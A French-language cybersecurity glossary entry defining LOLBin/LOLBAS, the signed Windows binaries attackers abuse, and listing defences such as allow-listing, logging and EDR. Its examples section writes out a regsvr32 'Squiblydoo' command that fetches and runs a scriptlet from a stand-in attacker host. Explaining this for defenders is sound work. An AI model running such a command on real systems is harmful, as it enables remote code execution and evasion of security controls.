Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 632

LOLBin / LOLBAS

Qu'est-ce que LOLBin / LOLBAS ?

LOLBin / LOLBASBinaire ou script natif et signe (LOLBin/LOLBAS) detourne par les attaquants pour executer du code, telecharger un payload, persister ou contourner des controles sous l'apparence d'un outil d'administration legitime.


Le LOLBin (Living-Off-the-Land Binary) et le projet plus large LOLBAS (Living-Off-the-Land Binaries And Scripts) repertorient les binaires, scripts et bibliotheques signes par Microsoft dont des effets secondaires sont exploitables a des fins offensives: executer du code arbitraire, telecharger des payloads, contourner le controle d'applications. Les exemples courants incluent rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe et certutil.exe. Comme chaque outil est signe et de confiance, les defenseurs ne peuvent pas se contenter de bloquer par hash et doivent distinguer les lignes de commande attendues des anormales. Les LOLBAS supportent de nombreuses techniques d'execution et d'evasion du MITRE ATT&CK. Les mitigations reposent sur l'application control en allow-listing, les logs de ScriptBlock et de creation de processus, les regles ASR et l'analytique comportementale EDR.

Exemples

  1. 01

    regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).

  2. 02

    msbuild.exe payload.xml pour executer du C# inline sans toucher au disque.

Questions fréquentes

Qu'est-ce que LOLBin / LOLBAS ?

Binaire ou script natif et signe (LOLBin/LOLBAS) detourne par les attaquants pour executer du code, telecharger un payload, persister ou contourner des controles sous l'apparence d'un outil d'administration legitime. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.

Que signifie LOLBin / LOLBAS ?

Binaire ou script natif et signe (LOLBin/LOLBAS) detourne par les attaquants pour executer du code, telecharger un payload, persister ou contourner des controles sous l'apparence d'un outil d'administration legitime.

Comment fonctionne LOLBin / LOLBAS ?

Le LOLBin (Living-Off-the-Land Binary) et le projet plus large LOLBAS (Living-Off-the-Land Binaries And Scripts) repertorient les binaires, scripts et bibliotheques signes par Microsoft dont des effets secondaires sont exploitables a des fins offensives: executer du code arbitraire, telecharger des payloads, contourner le controle d'applications. Les exemples courants incluent rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe et certutil.exe. Comme chaque outil est signe et de confiance, les defenseurs ne peuvent pas se contenter de bloquer par hash et doivent distinguer les lignes de commande attendues des anormales. Les LOLBAS supportent de nombreuses techniques d'execution et d'evasion du MITRE ATT&CK. Les mitigations reposent sur l'application control en allow-listing, les logs de ScriptBlock et de creation de processus, les regles ASR et l'analytique comportementale EDR.

Comment se défendre contre LOLBin / LOLBAS ?

Les défenses contre LOLBin / LOLBAS combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.

Quels sont les autres noms de LOLBin / LOLBAS ?

Noms alternatifs courants : LOLBAS, Binaire Living-off-the-Land.

Termes liés